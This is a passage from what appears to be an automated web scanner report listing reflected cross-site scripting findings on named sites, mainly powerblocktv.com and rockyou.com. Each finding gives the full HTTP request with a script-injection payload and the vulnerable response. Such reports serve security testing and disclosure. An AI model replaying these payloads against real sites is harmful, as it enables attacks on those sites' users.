Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 18 Apr 2011 19:02:43 GMT
Connection: close
Set-Cookie: AnalysisUserId=64.212.60.188.1303153363042556; path=/; expires=Tue, 17-Apr-12 19:02:43 GMT; domain=.nike.com

jsonp130315339270035a95<script>alert(1)</script>64c16fbc047({"serviceResponse": {
"header": {
"success": "false",
"dateTime": "2011-04-18 19:02:43.50 UTC",
"errorCodes": [
]
},
"body": {}
}});

4.142. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e205"-alert(1)-"df5df20c25c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site3?2e205"-alert(1)-"df5df20c25c=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=kef6as1gij6m5t71r81rkjqdn2; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:43:20 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="http://www.powerblocktv.com/site3/?2e205"-alert(1)-"df5df20c25c=1"
s.server="powerblocktv.com"
s.channel="powerblocktv:powerblock"
s.pageType=""
s.prop1="powerblocktv:powerblock"
s.prop2="powerblocktv:powerblock"
s.prop3=s.getQueryParam('cid')
s.prop4="section:pow
...[SNIP]...

4.143. http://www.powerblocktv.com/site3 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5b48d--><script>alert(1)</script>d4c896e4647 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /site3?5b48d--><script>alert(1)</script>d4c896e4647=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:27 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=jf9p5s3n2i55jpinqanm3p6lh6; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:43:29 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<a href="/site3/index.php?5b48d--><script>alert(1)</script>d4c896e4647=1&amp;fontstyle=f-larger" title="Increase size" class="large">
...[SNIP]...

4.144. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 866d0--><script>alert(1)</script>f077daa7caa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /site3/?866d0--><script>alert(1)</script>f077daa7caa=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:30 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=0sj6r0fsgckvhq2fi6m4msanb4; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:43:32 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78316


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<a href="/site3/index.php?866d0--><script>alert(1)</script>f077daa7caa=1&amp;fontstyle=f-larger" title="Increase size" class="large">
...[SNIP]...

4.145. http://www.powerblocktv.com/site3/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 345d8"-alert(1)-"4bb40acc350 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site3/?345d8"-alert(1)-"4bb40acc350=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Set-Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=74t3j28l0kfbactd0l4b8gbnr0; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:43:23 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 78252


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="http://www.powerblocktv.com/site3/?345d8"-alert(1)-"4bb40acc350=1"
s.server="powerblocktv.com"
s.channel="powerblocktv:powerblock"
s.pageType=""
s.prop1="powerblocktv:powerblock"
s.prop2="powerblocktv:powerblock"
s.prop3=s.getQueryParam('cid')
s.prop4="section:pow
...[SNIP]...

4.146. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [h parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/fpss/templates/pb-temp/template_css.php

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload e31f2<script>alert(1)</script>21efb87fa3a was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site3/fpss/templates/pb-temp/template_css.php?w=675&h=275e31f2<script>alert(1)</script>21efb87fa3a&sw=200 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=j7edhcslagi7fabj68o4ef19k2; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:02 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Content-Length: 4098
Connection: close
Content-Type: text/css; charset: UTF-8

/*
// "Frontpage Slideshow" by JoomlaWorks - Version 1.7.2
// Copyright (c) 2006 - 2008 JoomlaWorks, a Komrade LLC company.
// This code cannot be redistributed without permission from JoomlaWorks
...[SNIP]...
;*/width:675px;border:0px solid #ccc;padding:0px;margin:0px auto;}
#fpss-container {position:relative;width:675px;}
#fpss-slider {overflow:hidden;background:none;/*clear:both;*/width:675px;height:275e31f2<script>alert(1)</script>21efb87fa3apx;}
#slide-loading {background:#000 url(loading_black.gif) no-repeat center;text-align:center;width:675px;height:275e31f2<script>
...[SNIP]...

4.147. http://www.powerblocktv.com/site3/fpss/templates/pb-temp/template_css.php [w parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/fpss/templates/pb-temp/template_css.php

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 5f01e<script>alert(1)</script>b3b56be9b1a was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /site3/fpss/templates/pb-temp/template_css.php?w=6755f01e<script>alert(1)</script>b3b56be9b1a&h=275&sw=200 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=j7edhcslagi7fabj68o4ef19k2; s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:43:01 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
Content-Length: 4098
Connection: close
Content-Type: text/css; charset: UTF-8

/*
// "Frontpage Slideshow" by JoomlaWorks - Version 1.7.2
// Copyright (c) 2006 - 2008 JoomlaWorks, a Komrade LLC company.
// This code cannot be redistributed without permission from JoomlaWorks
...[SNIP]...
rontpageslideshow.net
// Developers: Fotis Evangelou - George Chouliaras
// ***Last update: May 4th, 2008***
*/

/* --- Slideshow Containers --- */
#fpss-outer-container {/*clear:both;*/width:6755f01e<script>alert(1)</script>b3b56be9b1apx;border:0px solid #ccc;padding:0px;margin:0px auto;}
#fpss-container {position:relative;width:6755f01e<script>
...[SNIP]...

4.148. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/index.php/xtreme

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a8299--><script>alert(1)</script>b3fc064eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /site3/index.php/xtreme?a8299--><script>alert(1)</script>b3fc064eb=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=j7edhcslagi7fabj68o4ef19k2; __utmz=4694322.1303144987.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; com_jw_fpss=true; __utma=4694322.1437869223.1303144987.1303144987.1303144987.1; __utmc=4694322; __utmb=4694322.500.10.1303144987

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:46:05 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:46:06 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 59209


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<a href="/site3/index.php/xtreme?a8299--><script>alert(1)</script>b3fc064eb=1&amp;fontstyle=f-larger" title="Increase size" class="large">
...[SNIP]...

4.149. http://www.powerblocktv.com/site3/index.php/xtreme [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.powerblocktv.com
Path:   /site3/index.php/xtreme

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 979f7"-alert(1)-"f80e343a350 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /site3/index.php/xtreme?979f7"-alert(1)-"f80e343a350=1 HTTP/1.1
Host: www.powerblocktv.com
Proxy-Connection: keep-alive
Referer: http://www.powerblocktv.com/site3/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 797c281b27bb0fb82da6f6fa2d15c6d7=j7edhcslagi7fabj68o4ef19k2; __utmz=4694322.1303144987.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=%5B%5BB%5D%5D; com_jw_fpss=true; __utma=4694322.1437869223.1303144987.1303144987.1303144987.1; __utmc=4694322; __utmb=4694322.500.10.1303144987

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 16:46:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.17
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Mon, 18 Apr 2011 16:46:02 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 59153


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" >


...[SNIP]...
<!--
/* You may give each page an identifying name, server, and channel on
the next lines. */
s.pageName="http://www.powerblocktv.com/site3/index.php/xtreme?979f7"-alert(1)-"f80e343a350=1"
s.server="powerblocktv.com"
s.channel="powerblocktv:powerblock"
s.pageType=""
s.prop1="powerblocktv:powerblock"
s.prop2="powerblocktv:powerblock"
s.prop3=s.getQueryParam('cid')
s.prop4="section:pow
...[SNIP]...

4.150. http://www.rockyou.com/developer/opensocial/opensocial-css.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /developer/opensocial/opensocial-css.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c370c<script>alert(1)</script>d157fc9846a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /developer/opensocial/opensocial-css.php?title=http://dev2.rockyou.com/developer/opensocial/images/bg-title-products/c370c<script>alert(1)</script>d157fc9846a.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:54:09 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=2734 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/css
Content-Length: 416

table {color:#414141}
th {text-align:left;font:bold 13px Arial, Helvetica, sans-serif}

.titlebar {background:url(http://dev2.rockyou.com/developer/opensocial/images/bg-title-products/c370c<script>alert(1)</script>d157fc9846a.gif) no-repeat;width:939px;height:91px;margin:15px auto 0px 18px}
.featurebox {background-color:#c0c0c0;width:594px;height:320px;padding:15px;font:bold 13px Arial, Helvetica, sans-serif}

4.151. http://www.rockyou.com/developer/opensocial/opensocial-css.php [title parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /developer/opensocial/opensocial-css.php

Issue detail

The value of the title request parameter is copied into the HTML document as plain text between tags. The payload 41041<script>alert(1)</script>916712ea3da was submitted in the title parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /developer/opensocial/opensocial-css.php?title=http://dev2.rockyou.com/developer/opensocial/images/bg-title-products.gif41041<script>alert(1)</script>916712ea3da HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 21:54:05 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=2674 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/css
Content-Length: 415

table {color:#414141}
th {text-align:left;font:bold 13px Arial, Helvetica, sans-serif}

.titlebar {background:url(http://dev2.rockyou.com/developer/opensocial/images/bg-title-products.gif41041<script>alert(1)</script>916712ea3da) no-repeat;width:939px;height:91px;margin:15px auto 0px 18px}
.featurebox {background-color:#c0c0c0;width:594px;height:320px;padding:15px;font:bold 13px Arial, Helvetica, sans-serif}

4.152. http://www.rockyou.com/login/ [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /login/

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4db16'><script>alert(1)</script>70ef5e4caf7 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E4db16'><script>alert(1)</script>70ef5e4caf7 HTTP/1.1
Host: www.rockyou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en; AAMBLFLAG=SET; lastlogin=1303164368; sns_type=rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:06:26 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=1186 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 493

<form method='post' id='redirect_form' action='https://www.rockyou.com/login/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E4db16'><script>alert(1)</script>70ef5e4caf7'></fo
...[SNIP]...

4.153. http://www.rockyou.com/login/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /login/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89cfe'><script>alert(1)</script>7080b8b8398 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E&89cfe'><script>alert(1)</script>7080b8b8398=1 HTTP/1.1
Host: www.rockyou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en; AAMBLFLAG=SET; lastlogin=1303164368; sns_type=rockyou.com

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:06:34 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=1276 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 496

<form method='post' id='redirect_form' action='https://www.rockyou.com/login/?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A44)%3C/script%3E&89cfe'><script>alert(1)</script>7080b8b8398=1'><
...[SNIP]...

4.154. http://www.rockyou.com/login/index.php [%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /login/index.php

Issue detail

The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f1fb9'><script>alert(1)</script>afa40935826 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3E parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /login/index.php?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3Ef1fb9'><script>alert(1)</script>afa40935826 HTTP/1.1
Host: www.rockyou.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lang=en; AAMBLFLAG=SET; lastlogin=1303164319

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 22:06:09 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=1341 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 502

<form method='post' id='redirect_form' action='https://www.rockyou.com/login/index.php?%27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000A5D)%3C/script%3Ef1fb9'><script>alert(1)</script>afa40935826'>
...[SNIP]...

4.155. http://www.rockyou.com/login/index.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rockyou.com
Path:   /login/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4c1fe'><script>alert(1)</script>9081e91ace1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
